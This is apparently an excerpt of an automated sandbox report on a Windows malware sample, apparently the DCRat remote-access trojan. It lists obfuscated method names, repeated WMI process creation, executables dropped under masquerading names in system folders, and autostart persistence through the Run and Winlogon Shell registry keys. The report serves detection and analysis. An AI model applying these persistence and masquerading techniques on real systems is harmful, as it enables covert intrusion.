Source: 1.3.Result.exe.2642c39.0.raw.unpack, bequvj7LEvf7jMw3QBR.cs	High entropy of concatenated method names: 'ltYKptt8IC', 'w8LKhIb1jl', 'XcLKeS2q9o', 'B00KfQGIcj', 'MBRK4mSGSE', 'Ok1ZgHcdCKC5PNmZ5XZ', 'hiNkOBczdYgcwmM0WV2', 'EwnYrHcJJRe0OA5jrcI', 'jEl7swco4f4JT9Gsxh2', 'yhfj2OVl19aSIaLjuRL'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, ldAW7AJN0cNZ6d5ssVJ.cs	High entropy of concatenated method names: '_525', 'L97', '_3t2', 'UL2', '_6V2', '_968', 'SPPpQDrkuDmGEHkN50R', 'rJgIDDr6XF9MvOCrEpo', 'YHMGd3r1TK00SlWgs2N', 'bQ2pxvrjrgJhNqWKrMA'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, RZGjsEawC2btEZ8YS3Q.cs	High entropy of concatenated method names: 'daNJ6NFEOG', 'Ri4bLU6APlpZdUBd04P', 'VIXdKa6wdXOM9dsiJQC', 'KlHeEw6pteTkvM87ivU', 'zviK7165NusbMJ4nexO', 'QcC46M6WVfItH5T4ntP', 'MFnd2062U3SgrIHdyd6', 'aFgylH6iTlP41yjshGa', 'XdLHNR6D34O0kSVinIh', 'MRLnNc6bhClZgpWq4VM'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, kcZoqPaOi0PIdHfWahr.cs	High entropy of concatenated method names: 'C8J7ybfPsa', 'r2U7wvM2Qp', 'SgVU071HrUEe0mDYsto', 'YqB8kv1cD0ytp7n8986', 'bn9S0u1r0Sn7iTEDT07', 'sex0vd1LaTawHjOI8nP', 'k8k7Wh1VG94kZQ2kZ0A', 'JnBPP91uW7SNwAJZ80l', 'kHk3aY1mtllUWpqdTjY', 'apxYe31yQEURxJITQAt'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, VD3ACbunfNyIAieYGaE.cs	High entropy of concatenated method names: 'IJJacU9S40', 'Gd2aE2bby0', 'HcTaqU85oL', 'bKeZIHPOkGWdvy7p9Wa', 'uU4ygmPbEe8KLU5arO2', 'XVgAFjPXSZhIZUZumPM', 'aUSZoxPPQu5bcZDgpBo', 'zVAmH4Ph48mqYkVj8b9', 'f0gXRtPk0cZEl1IuHIL', 'CQviBJP6dMfHSBFakYf'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, iL157tR9IJ4n9Z8HDyg.cs	High entropy of concatenated method names: 'AY3qfNNhmn', 'eJxq4k1131', 'FDmq0TZt90', 'ijOqAduAGY', 'DZTqIjbJgs', 'lwgEXR3mj0hDAiNAqs7', 'q6KgDY3V8y1GG6Py9lg', 'G8BYtQ3u0btXZvVn6HB', 'I7ZC5b3ydAhUxxkJsOD', 'dXGV6b3sQbckxmObsam'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, oWkbW3uJrCVSqE37LEN.cs	High entropy of concatenated method names: 'R1x', 'YZ8', '_8U7', 'G9C', 'eTLP8B2sFfFvO1hBNeI', 'SEWERE2BF1VTyqJQNVn', 'FHLDWR2Tdn3hhtHLi1Y', 'LuEL1T2tkbulN9kE9xb', 'HCsTKE2GMFFxat01Pil', 'xKdH2i2CC4PsASvyHJY'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, r4fcx1J8sA9v5jvJq3s.cs	High entropy of concatenated method names: 'FIwmjmyJic', 't5FmYqvXKN', 'uUNmPCLenx', 'cqim6Uuequ', 'ajEmlvf7jM', 'njkfbt72N9EQXwb6dKA', 'VItXwq7inawyV9cKDVe', 'FICwVx7wXrguw9BjYk7', 'YkfNJ17WPQX9MNTrvwU', 'co60uf7DVT75OwFd0CW'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, g357BcsySpWm2aqpGZs.cs	High entropy of concatenated method names: 'gHycqZ4VGXl3vO9j8ae', 'RlhEwa4uQLDKAuqFVka', 'LiuglG4HRlGt5kj6Yct', 'PoraGS4cn8F6lilr8Dh', 'gUcWwWfH1v', 'yjXy2y4st5CKiRBYOS9', 'Wh2vCT4BdgKTOJgpVce', 'T6kOcD4T8owPSo8MASG', 'M7bMvi4tZdklVH81bMh', 'LAmlpv4GgQsoF0t1lEZ'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, isPSxKzBHroYjkmh9f.cs	High entropy of concatenated method names: 'Y29', 'YZ8', 'jn6', 'G9C', 'B4ity72AarUHCPZKYgL', 'bt2gwJ2wXG7SHcy2agW', 'hrP09p2W49JJ7uZyW6N', 'c0Aqai22XGQo5tbwEdG', 'gOSqMe2iDPOtWXujZoU', 'rDtsuW2DRWh2cIAVduZ'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, pfo4q4aQk5FuH1OX904.cs	High entropy of concatenated method names: 'ixfR1o4q4k', 'RFWtggMo8Z4rPZkrGUA', 'QhpN4CMd337I9Z7HUJH', 'seC42VMaASkscefaLN1', 'u49ltWMJ44EGDronl5K', 'ONaxG7MzAeKj9It4js8', 'wbn9y2qlIalQ4yMBnsZ', 'RQfsf4qpIhnnxjwvV0w', 'rbrLCGq5qSWsNyIftG1', 'V76KMdqAH8KohplaxcH'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, RO8oBiu9FUMJCr75hww.cs	High entropy of concatenated method names: 'Ai7', 'YZ8', '_56U', 'G9C', 'eA1rXvDdn2rkVGABqjg', 'ybhvB3DzlInaZSMRwca', 'APiVpybl9yor6D3xRjE', 'Fjpyv7bpjKEsPBvEjBv', 'bPhq4ib5Rtp06QRQH4G', 'bUiQeUbA3uKgWkpZBmD'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, J3GmXcsVgB8xj2jgOy1.cs	High entropy of concatenated method names: 'aAXWq8nDhs', 'zK3WVUg6Gk', 'R9UWkiyXhJ', 'p0BW9uM3mh', 'TIIWSZYYRM', 'paIWtgFZdq', 'zueW1rCm7g', 'kq4WiEnGgH', 'TZKWWY5Hdq', 'kaQWTl6ne3'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, NeDMGK7MbPn0xXYwDsh.cs	High entropy of concatenated method names: 'ICU', 'j9U', 'IBK', '_6qM', 'Amn', 'Mc2', 'og6', 'z6i', '_5G6', 'r11'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, zvPoZsuLyut2friVVKx.cs	High entropy of concatenated method names: 'd43', 'YZ8', 'g67', 'G9C', 'eG6nLUiuxUKnV5eLyXi', 'pUJZ1PimjKH6gsvY63v', 'zjOkeJiyvbqcNnbFZqd', 'qaoBcXisKJSL2cc2ZXP', 'HPxaTGiBQLTYlkyhoMW', 'n1Z4yCiTsrZ8jEutMOd'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, lUg6IVuNPD8o5vWXyvq.cs	High entropy of concatenated method names: 'gHL', 'YZ8', 'vF9', 'G9C', 'xmpuSHDHtONu3DY7gI5', 'f0DCvDDcOrmE0YuSXqj', 'EWe5ygDVqMDrknMPwW2', 'yOd3agDuEHM5GrTE2em', 'tKfajGDmEYqYmk3Ma2t', 'kwU5f5DyNawbeRABWSo'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, y6B2sEu8BO50D0gpddW.cs	High entropy of concatenated method names: 'yiQ', 'YZ8', '_5li', 'G9C', 'OeJ3AiDlFOeTZE9sPLU', 'BYlUfIDpJ0Zx9U2UUF2', 'oCJNCsD57IThYmAHZ8e', 'sT4aVdDA811tE9PcOat', 'GlrImTDwSlwWhcTmSAR', 'QbcgfrDWrMMZvuFM5I5'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, ECGWeuJ6XU2xwjttGYt.cs	High entropy of concatenated method names: 'dK9IoRH30gleVrH40CO', 'XvqFU6HKSFUCkW5DiUU', 'O3oU8MHCdNyvewbRsv3', 'oRm8v9HfUVTMRiR0akc', 'IWF', 'j72', 'F4ECxC3aYt', 'l5AC83tX1e', 'j4z', 'JADCBWNQkt'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, fCvAaGJbOISiMM9DuTO.cs	High entropy of concatenated method names: 'SbeZ2IyDjp', 'fEhZrH8LWq', 'jHfZxeSfF0', 'dtU9Nw7x10FSqWluxA6', 'uvkdFt7YbRCSR9eoGHL', 'Mm0VKs7EpTpfMZaMUcr', 'wt0onG7ghd1YfXogUOf', 'eP9ZGBBYXL', 'tuqZshxXjT', 'XfbZmATHvV'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, fD5S5GaeHF8smwvouSD.cs	High entropy of concatenated method names: '_0023Nn', 'Dispose', 'gSVRQSJ8O5', 'syWRp5GD5S', 'RGHRhF8smw', 'aouReSDFpS', 'xoGRf9UAwJ', 'R90KP9qbBddXc9Whdf9', 'bUdNn8qXrlWpkCaf2Oj', 'CFhsfAqiL9e2aM9bRsX'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, VDWJntWWlw06vjKFE9.cs	High entropy of concatenated method names: '_52Y', 'YZ8', 'Eg4', 'G9C', 'UKF4W4Ftj', 'FtRNb25niECe3TqxKBF', 'Haw5205vt4HG2oMmh1J', 'w0iwxr59JfXiCHXXckh', 'CLZh3M57j2VYIXhdV6P', 'I1tL9G5rKYZZjOR5TRd'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, QECQLMRJjJZmG5cxf27.cs	High entropy of concatenated method names: 'fk9F0KtrL0YK8Pvtsle', 'r5Ub1vtL4B55HmSjDMf', 'uEc4hAt9PcIsBR4khIt', 'TnP6BLt7OF4u1rZRYj0', 'lwhOqtffOA', 'eb49OdtV1hCpJNvaFcg', 'tWEpNltuJAG6Nv5Qyo6', 'bsSIF9tHAPhHXfTeOQu', 'q47p9ctcnrhvSJ9TQHn', 'gkxuj6tmQkcP6mg0Qhy'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, k9bi73G9mowv1Yj05Z4.cs	High entropy of concatenated method names: 'D4M', '_4DP', 'HU2', '_4Ke', '_5C9', '_7b1', 'lV5', 'H7p', 'V5L', '_736'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, J5j6tMur4opWnoEyDT1.cs	High entropy of concatenated method names: '_981', 'YZ8', 'd52', 'G9C', 'IPfpariIU4UxmBe88H8', 'dqEwYIi8LVaEAnky12k', 'minJ2TiS4ZlMrpVDkU2', 'wXqoecia0Ip93eaosPk', 'wgdo4YiJFQWgEY5AZPM', 'sNnD1Fio1uSsy6VCZWV'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, Sm7FCVRPUjdKT87y6Up.cs	High entropy of concatenated method names: 'uknV7FveCA', 'WFMVRkpmJ0', 'aUYVGRi5bn', 'xb3Vsr1JtK', 'gHCVmj7fS7', 'aDqVZ9oSaf', 'OCpVCQxuwD', 'cyeVFU2RLd', 'HY4VKautly', 'CkbVLUnWBR'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, xODuXeu0FIatQXDBxY7.cs	High entropy of concatenated method names: 'lvMaucu3Am', 'KSsaa4s9Pp', 'bsaaJRRIWx', 'b8RUhRXQ6kEHvPUxLiJ', 'Uu89pZXIh0GHuZkWmhO', 'vWpbI3XeBI4hJaPtsjx', 'sCCVLpXFHpsMyYmNdAo', 'pva2NcX8PT7YKYP75ZS', 'DlQYEpXS6QyrSOvW5Lo', 'jkEnI8XacSVkZvssR5k'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, em50CEGU2PgNRVJruTE.cs	High entropy of concatenated method names: 'PJ1', 'jo3', 'Rsu1Z4V8dD', 'ySG1CWKfXh', 'oyy1FYZ7Mj', 'EC9', '_74a', '_8pl', '_27D', '_524'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, yHjnyrXIDUbermwuYI.cs	High entropy of concatenated method names: 'g25', 'YZ8', '_23T', 'G9C', 'GkuI6GEEd', 'w2qLZ15C7K5xAnc22GK', 'x6A02O5fZPRkUKNElhA', 'zP0qF353HX0BQX1a2ZT', 'nIAs3X5KE8vC8bmPN2N', 'sAwNRe5RWAXEkv4EEDJ'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, gHURQlJ7aCCH0lBIKXn.cs	High entropy of concatenated method names: 'nfEsAgtGXi', 'O8VsI83LSF', 'tU5sUYGORO', 'bTus3tMYam', 'FrWsDX94ms', 'qpQsHcgXTb', 'B5S3o0nydvo8835xMDr', 'WwnjMknuNE4YeHRhIFH', 'uUWvTMnm8C8e5MaXcKM', 'nvTQqFnsD6DC7Ij5wQM'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, ofJ1RPRQqGuLNDpEiI3.cs	High entropy of concatenated method names: 'XxmVvywmnm', 'Clx0IZ3J20QWK2TgKdZ', 'H5t7813SjErX15N3BCY', 'lY2kt63aVtGL6TKNlIa', 'pCs1d73oGGfUoVyNcXu', 'ro7Dii3dInbH4Ko8600', 'ovX94v3zY7rCg38iqWq'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, COd7l9Jrce6yBgJOwFE.cs	High entropy of concatenated method names: 'EZLmg3AHwt', 'cbOm5I1qGr', 'jjAmoNcjaT', 'ktLL0C94c4msr6h72ft', 'z4eXEH9ZmwnZhPAixp0', 'qk2ETj9NSc0XqnnpEJF', 'VHfUke9eKIAGNuhqDd1', 'Fcn73O9FBdkrVZbKNQ3', 'PG9nOr9QpC3wvgrimum', 'LqCEht9IWX09cRDiIdf'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, uNFEOGuoEdjm4vpiMLI.cs	High entropy of concatenated method names: '_7v4', 'YZ8', '_888', 'G9C', 'UjsC4NOT4XXCBssLN93', 'sldjkEOt6Q5SUQPj0TL', 'cMJykHOGHFEw8FUJLqE', 'pc0ZJWOCGyQHIrOo05l', 'JmgRuPOfvjlwpM7FrOM', 'P7a5GqO3eo7EeRrhYiM'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, ToLjk3gvWXZNAAPPEs.cs	High entropy of concatenated method names: 'kcq', 'YZ8', '_4bQ', 'G9C', 'rmAWQyW2oIrQjCaiDiE', 'qwhO4UWiFFlZq26SNtQ', 'Pm10aKWDU3pAduiLEN8', 'oAYmffWbI2eiCXcAhg5', 'J2AENtWXdqJK1dZHNd0', 'fKjKPKWOmSW5BohAFBM'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, SE9XYP6ZrMTs98IqVA.cs	High entropy of concatenated method names: '_88Z', 'YZ8', 'ffV', 'G9C', 'f1U7RqWggDYThuUAEMl', 'KU8C5RW4fbspPQ5WHlb', 'caag74WZM4W1a3vcDa1', 'NEfO60WNSwMdA9VYEsY', 'lmQeoIWe10uuw4WYO2Q', 'ocOOQPWF1DpJt15M68I'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, tMovr3GV7CohDM44Ho9.cs	High entropy of concatenated method names: '_7tu', '_8ge', 'DyU', '_58f', '_254', '_6Q3', '_7f4', 'B3I', '_75k', 'd4G'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, Qaas3LcbKU1PXAy0Tg.cs	High entropy of concatenated method names: 'nBSqVpFEX', 'qayV2nntS', 'Rb5kkk4OD', 'Jfu9xkHS5', 'mnQSeY7Eu', 'CLGtYK0wq', 'FIt1g6BXB', 'wooyggpDGhfhPRGFFkS', 'NDw7fPpbjMe6FThWwLD', 'PwpWRupXFG8PHehhJhe'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, hCsNyXJD5vKLl0WFlhC.cs	High entropy of concatenated method names: 'oYo', '_1Z5', 'lZ8T0s0OrX', 'TNCC7kYobG', 'RQmTC8heMW', 'YJYnkyLkR8JSRoAdO4W', 'HkH37AL6CwPcWAw6myF', 'if3eydL1Qd3QF2BGkBU', 'LQZlNqLj1TyrmWpJQQT', 'KotKdILMgTkTvcnLxuP'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, p4VMiu79MPUyk8DkE6i.cs	High entropy of concatenated method names: 'JeMyXos1Mo', 'SdLyQPn7LQ', 'ybcyplpcur', 'xg3yh4a4jx', 'jBAyelkSal', 'p1oRIsunLidrkxQK4lU', 'tqgvr8uqijJEd8w7OMC', 'BhuM0PuU0kdmyxuA67K', 'HPuWJ2uvKlQgjmZ1RIm', 'ixw6K5u9fUIJHcUSbCg'

Persistence and Installation Behavior

Creates processes via WMI

Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	File created: C:\Windows\IdentityCRL\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	File created: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File created: C:\Users\user\AppData\Roaming\XClient.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	File created: C:\Windows\IME\IMEKR\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\sihost.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	File created: C:\Windows\ELAMBKUP\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	File created: C:\Program Files\Uninstall Information\OfficeClickToRun.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	File created: C:\Recovery\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	File created: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	File created: C:\Program Files\Windows Photo Viewer\en-GB\UserOOBEBroker.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe	File created: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	File created: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	File created: C:\Recovery\XClient.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	File created: C:\Program Files (x86)\jDownloader\config\conhost.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	File created: C:\Program Files\Windows Multimedia Platform\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	File created: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe	File created: C:\Users\user\AppData\Local\Temp\XClient.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	File created: C:\Program Files\Windows Photo Viewer\en-GB\RuntimeBroker.exe	Jump to dropped file

Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe

File created: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe

Jump to dropped file

Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	File created: C:\Windows\IdentityCRL\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	File created: C:\Windows\IME\IMEKR\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	File created: C:\Windows\ELAMBKUP\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Jump to dropped file

Boot Survival

Creates an autostart registry key pointing to binary in C:\Windows

Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH

Creates an undocumented autostart registry key

Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
